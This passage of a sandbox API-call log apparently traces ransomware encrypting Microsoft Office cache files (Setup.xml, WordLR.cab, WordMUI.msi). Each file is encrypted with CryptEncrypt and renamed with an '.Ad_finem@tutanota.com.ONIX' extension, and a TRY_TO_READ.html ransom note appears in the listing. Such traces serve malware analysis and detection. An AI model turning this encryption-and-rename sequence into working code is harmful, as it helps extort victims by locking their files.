Flags=0x0, Size=0x40) returned 0x454160 [0091.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0091.774] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.774] GetLastError () returned 0x0 [0091.774] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.774] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0091.774] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.774] GetLastError () returned 0x0 [0091.774] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0091.774] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0091.774] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.774] GetLastError () returned 0x0 [0091.774] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x484 [0091.774] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0091.775] LockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x978, nNumberOfBytesToLockHigh=0x0) returned 1 [0091.775] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.775] ReadFile (in: hFile=0x484, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0091.776] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.776] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.776] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0091.776] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0091.777] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0091.777] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0091.777] GetProcessHeap () returned 0x410000 [0091.777] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0091.777] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" [0091.777] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0091.777] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2424) returned 1 [0091.777] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x978 [0091.777] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0091.777] GetProcessHeap () returned 0x410000 [0091.777] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0091.777] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0091.777] WriteFile (in: hFile=0x484, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0091.779] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0091.780] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0091.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x978) returned 0x4b5b28 [0091.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x978) returned 0x4b64a8 [0091.784] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.784] ReadFile (in: hFile=0x484, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x978, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x978, lpOverlapped=0x0) returned 1 [0091.784] SetFilePointer (in: hFile=0x484, lDistanceToMove=-2424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.784] WriteFile (in: hFile=0x484, lpBuffer=0x4b64a8*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b64a8*, lpNumberOfBytesWritten=0x367f44c*=0x978, lpOverlapped=0x0) returned 1 [0091.786] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0091.786] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b64a8 | out: hHeap=0x410000) returned 1 [0091.786] UnlockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x978, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0091.786] CloseHandle (hObject=0x484) returned 1 [0091.788] GetProcessHeap () returned 0x410000 [0091.788] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0091.788] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0091.790] GetProcessHeap () returned 0x410000 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0091.790] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bf60d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.790] GetLastError () returned 0x0 [0091.790] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0091.790] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.790] GetLastError () returned 0x0 [0091.790] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x484 [0091.790] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0091.791] LockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x29c6dbd, nNumberOfBytesToLockHigh=0x0) returned 1 [0091.791] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.791] ReadFile (in: hFile=0x484, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0091.793] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.794] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.794] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0091.794] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0091.794] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", dwFileAttributes=0x80) returned 1 [0091.794] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 74 [0091.794] GetProcessHeap () returned 0x410000 [0091.794] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x467908 [0091.794] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" [0091.794] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0091.794] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=43806141) returned 1 [0091.794] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x29c6dbd [0091.794] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0091.794] GetProcessHeap () returned 0x410000 [0091.794] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0091.794] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0091.795] WriteFile (in: hFile=0x484, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0091.797] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0091.798] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0091.799] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x29c6dbd) returned 0x3680020 [0091.800] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x29c6dbd) returned 0x6050020 [0091.802] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.802] ReadFile (in: hFile=0x484, lpBuffer=0x3680020, nNumberOfBytesToRead=0x29c6dbd, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x29c6dbd, lpOverlapped=0x0) returned 1 [0095.021] UnlockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x29c6dbd, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.021] CloseHandle (hObject=0x484) returned 1 [0095.295] GetProcessHeap () returned 0x410000 [0095.295] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.295] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.307] GetProcessHeap () returned 0x410000 [0095.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.307] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0095.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0095.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.307] GetLastError () returned 0x0 [0095.307] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x484 [0095.307] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.308] LockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x267e00, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.308] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.308] ReadFile (in: hFile=0x484, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.310] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.310] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.310] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.310] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.310] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", dwFileAttributes=0x80) returned 1 [0095.311] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 75 [0095.311] GetProcessHeap () returned 0x410000 [0095.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0095.311] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" [0095.311] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.311] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2522624) returned 1 [0095.311] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x267e00 [0095.311] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.311] GetProcessHeap () returned 0x410000 [0095.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.311] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.311] WriteFile (in: hFile=0x484, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.313] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.315] WriteFile (in: hFile=0x484, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x267e00) returned 0x3680020 [0095.316] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x267e00) returned 0x38f0020 [0095.316] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.316] ReadFile (in: hFile=0x484, lpBuffer=0x3680020, nNumberOfBytesToRead=0x267e00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x267e00, lpOverlapped=0x0) returned 1 [0095.461] UnlockFile (hFile=0x484, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x267e00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.461] CloseHandle (hObject=0x484) returned 1 [0095.497] GetProcessHeap () returned 0x410000 [0095.497] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.497] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.499] GetProcessHeap () returned 0x410000 [0095.499] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.499] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.499] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.499] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.499] FindNextFileW (in: hFindFile=0x48e9f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0095.499] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.499] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 